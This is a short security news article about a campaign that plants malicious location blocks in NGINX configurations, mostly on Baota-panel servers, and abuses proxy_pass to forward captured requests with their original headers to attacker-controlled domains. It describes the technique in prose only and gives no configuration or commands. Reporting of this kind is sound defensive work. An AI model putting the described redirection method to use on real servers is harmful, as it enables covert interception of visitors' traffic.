A malicious campaign is currently targeting NGINX servers by injecting unauthorized configuration blocks to hijack and reroute legitimate user traffic. By leveraging standard management directives, attackers are able to funnel specific requests through their own infrastructure without triggering traditional security alerts.
Security researchers have identified a specialized attack pattern targeting NGINX, a widely used open-source tool for web serving and traffic management. The campaign specifically focuses on installations associated with Baota hosting panels, frequently appearing on websites with Asian top-level domains or those belonging to government and educational institutions. Because NGINX is designed to act as an intermediary for load balancing and proxying, it provides a high-leverage point for attackers to intercept data before it reaches its intended destination.
The technical execution of this threat involves the silent modification of existing NGINX configuration files. Threat actors insert malicious location blocks that are programmed to capture incoming web requests on specific URL paths chosen by the attacker. This method allows the compromise to remain hidden within the standard operational logic of the server, making it difficult for administrators to notice changes during routine maintenance.
Once a request is captured, the modified server rewrites the traffic to include the full original URL and forwards it to an external domain under the attacker's control. This is achieved through the abuse of the proxy pass directive, a legitimate feature typically used to distribute traffic across multiple backend servers to ensure high performance. Because the directive is a fundamental part of NGINX’s intended functionality, its use for malicious redirection does not usually flag any security warnings.
To maintain the illusion of legitimacy, the hijacked traffic retains its original metadata. Crucial request headers, including the host identity, user agent strings, and the real IP address of the visitor, are preserved as the data moves through the attacker's backend. This ensures that the redirected traffic looks identical to standard web requests, preventing simple filtering tools from identifying the rerouting as an anomaly.
This stealthy approach allows the threat actors to monitor or manipulate user interactions while remaining embedded in the victim's infrastructure. By mimicking the way modern web architecture handles load balancing, the campaign turns a standard performance tool into a conduit for data interception. The discovery highlights a growing trend of attackers utilizing native software features to bypass traditional detection mechanisms in high-value networking environments.
Source: Hackers Compromise Nginx Servers To Redirect Legitimate User Traffic